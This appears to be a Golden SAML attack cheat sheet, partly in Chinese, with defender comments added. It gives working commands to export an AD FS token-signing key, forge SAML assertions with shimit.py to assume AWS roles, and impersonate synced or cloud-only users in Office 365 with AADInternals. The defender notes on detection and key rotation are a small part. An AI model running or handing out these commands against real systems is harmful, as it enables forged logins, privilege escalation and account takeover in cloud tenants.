# From an "AD FS" session
# After having exported the key with mimikatz
# ADFS Public Certificate (Base64 of the certificate's raw DER bytes)
[System.Convert]::ToBase64String($cer.RawData)
# IdP Name (the federation service identifier, as an absolute URI)
(Get-ADFSProperties).Identifier.AbsoluteUri
# Role Name (issuance transform rules of the configured relying party trusts)
(Get-ADFSRelyingPartyTrust).IssuanceTransformRule
# Defender note: the token-signing private key is the asset that matters here; if its
# export is suspected, rotating the AD FS token-signing certificate invalidates any
# token signed with the old key.
# Apply session for AWS cli
python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file -c cert_file -u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012
# Defender note: sessions obtained this way show up in CloudTrail as AssumeRoleWithSAML
# events; a SAML assertion accepted by AWS that has no matching issuance in the AD FS logs
# is the signal to look for.
# idp - Identity Provider URL e.g. http://server.domain.com/adfs/services/trust
# pk  - Private key file full path (pem format)
# c   - Certificate file full path (pem format)
# u   - User and domain name e.g. domain\username (use \\ or quotes in *nix)
# n   - Session name in AWS
# r   - Desired roles in AWS. Supports multiple roles; the first one specified will be assumed.
# id  - AWS account id e.g. 123456789012
# Save SAMLResponse to file
python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file -c cert_file -u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012 -o saml_response.xml
本地 -> 云
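# With a domain user you can get the ImmutableID of the target user
# (the ImmutableID is the Base64 encoding of the on-prem account's ObjectGUID bytes)
[System.Convert]::ToBase64String((Get-ADUser -Identity <username> | select -ExpandProperty ObjectGUID).tobytearray())
# On AD FS server execute as administrator
Get-AdfsProperties | select identifier
# When setting up the AD FS using Azure AD Connect, there is a difference between IssueURI on ADFS server and Azure AD.
# You need to use the one from AzureAD.
# Therefore, check the IssuerURI from Azure AD too (Use MSOL module and need GA privs)
Get-MsolDomainFederationSettings -DomainName deffin.com | select IssuerUri
# Extract the ADFS token signing certificate from the ADFS server using AADInternals
Export-AADIntADFSSigningCertificate
# Impersonate a user to access cloud apps
Open-AADIntOffice365Portal -ImmutableID v1pOC7Pz8kaT6JWtThJKRQ== -Issuer http://deffin.com/adfs/services/trust -PfxFileName C:\users\adfsadmin\Documents\ADFSSigningCertificate.pfx -Verbose
# Defender note: a sign-in whose token was minted with the exported certificate never
# passes through AD FS authentication, so cloud sign-in records with no corresponding
# AD FS sign-in event are the primary detection; rotating the token-signing certificate
# is the containment step.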
也可以为仅云用户创建 ImmutableID 并冒充他们。
# Create a realistic ImmutableID and set it for a cloud only user
# (a fresh GUID, Base64-encoded, is indistinguishable in shape from a synced ObjectGUID)
[System.Convert]::ToBase64String((New-Guid).tobytearray())
# Write the value as the SourceAnchor of the cloud object identified by its CloudAnchor
Set-AADIntAzureADObject -CloudAnchor "User_19e466c5-d938-1293-5967-c39488bca87e" -SourceAnchor "aodilmsic30fugCUgHxsnK=="
# Defender note: an ImmutableID appearing on an account that is not in scope of directory
# synchronisation is an anomaly worth alerting on.
# Extract the ADFS token signing certificate from the ADFS server using AADInternals
Export-AADIntADFSSigningCertificate
# Impersonate the user (the ImmutableID is the one set on the cloud-only account above)
Open-AADIntOffice365Portal -ImmutableID "aodilmsic30fugCUgHxsnK==" -Issuer http://deffin.com/adfs/services/trust -PfxFileName C:\users\adfsadmin\Desktop\ADFSSigningCertificate.pfx -Verbose